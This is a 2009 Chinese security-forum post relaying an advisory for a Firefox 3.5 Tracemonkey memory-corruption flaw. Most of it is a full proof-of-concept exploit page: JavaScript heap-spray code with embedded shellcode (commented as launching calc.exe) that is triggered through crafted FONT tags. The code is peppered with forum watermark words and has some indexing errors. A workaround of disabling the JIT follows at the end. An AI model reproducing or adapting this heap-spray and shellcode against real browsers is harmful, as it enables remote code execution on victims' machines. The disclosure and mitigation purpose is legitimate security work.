Board logo

标题: 【播报】Firefox Tracemonkey组件远程代码执行漏洞 [打印本页]

作者: 不属于    时间: 2009-11-10 10:13     标题: 【播报】Firefox Tracemonkey组件远程代码执行漏洞

受影响系统:
Mozilla Firefox 3.5
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 35660

Firefox是一款开放源码的WEB浏览器。  

Firefox的Javascript渲染引擎的Tracemonkey组件没有正确地恢复转义函数结果的返回值,如果用户受骗访问了包含有恶意font HTML标签的网页就可以触发内存破坏,导致在浏览器中执行任意代码。 信息来自:http://www.3ast.com.cn

<*来源:Simon Berry-Byrne
   
  链接:http://secunia.com/advisories/35798/
        [url=http://www.kb.cert.org/vuls/id/443060]http://www.kb.cert.org/vuls/id/443060 [url=http://www.3ast.com.cn]黑客

        https://bugzilla.mozilla.org/show_bug.cgi?format=multiple&amp;id=503286 [url=http://www.3ast.com.cn]网络安全
*>

测试方法:
-------------------------------------------------------------------------------- 网络安全

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<html>

<head>

<title>Firefox 3.5 Vulnerability</title>

Firefox 3.5 Heap Spray Vulnerabilty

</br>

Author: SBerry aka Simon Berry-Byrne

</br>

Thanks to HD Moore for the insight and Metasploit for the payload 信息来自:http://www.3ast.com.cn

<div id="content">

<p>

<FONT>                              

</FONT>

</p>

<p>

<FONT>Loremipsumdoloregkuw</FONT></p>

<p>

<FONT>Loremipsumdoloregkuwiert</FONT>

</p>

<p>

<FONT>Loremikdkw  </FONT>

</p>

</div>

<script language=JavaScript>



/* Calc.exe */

var shellcode = unescape("%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800" +    网络安全

                       "%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" +    黑客

                       "%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" +    黑客

                       "%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" +    网络安全

                       "%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" +    网络安全

                       "%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" +    黑客

                       "%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" +    黑客

                       "%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40" +    网络安全

                       "%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18" +    网络安全

                       "%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0" +    网络安全

                       "%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B" +   

                       "%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24" +   

                       "%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9" +    黑客

                       "%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C" +    网络安全

                       "%u652E%u6578%u9000");

/* Heap Spray Code */            

oneblock = unescape("%u0c0c%u0c0c");

var fullblock = oneblock;

while (fullblock.length<0x60000)   

{

    fullblock += fullblock;

}

sprayContainer = new Array();

for (i=0; i<600; i++)   

{

    sprayContainer = fullblock + shellcode;

}

var searchArray = new Array()



function escapeData(data)

{

var i;

var c;

var escData=’’;

for(i=0;i<data.length;i++)

  {

   c=data.charAt(i);

   if(c==’&’ || c==’?’ || c==’=’ || c==’%’ || c==’ ’) c = escape(c);

   escData+=c;

  }

return escData;

}



function DataTranslator(){

    searchArray = new Array();

    searchArray[0] = new Array();

    searchArray[0]["str"] = "blah";

    var newElement = document.getElementById("content") 黑客

    if (document.getElementsByTagName) {

        var i=0;

        pTags = newElement.getElementsByTagName("p")

        if (pTags.length > 0)   

        while (i<pTags.length)

        {

            oTags = pTags.getElementsByTagName("font") 网络安全

            searchArray[i+1] = new Array()

            if (oTags[0])   

            {

                searchArray[i+1]["str"] = oTags[0].innerHTML; 信息来自:http://www.3ast.com.cn

            }

            i++

        }

    }

}



function GenerateHTML()

{

    var html = "";

    for (i=1;i<searchArray.length;i++)

    {

        html += escapeData(searchArray["str"])

    }     

}

DataTranslator();

GenerateHTML()

</script>

</body>

</html>

<html><body></body></html>
复制代码建议:
--------------------------------------------------------------------------------
临时解决方法:

* 使用about:config界面,将javascript.options.jit.content和javascript.options.jit.chrome设置为false。 网络安全

厂商补丁:

Mozilla
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.mozilla.org/




欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/) Powered by Discuz! 7.2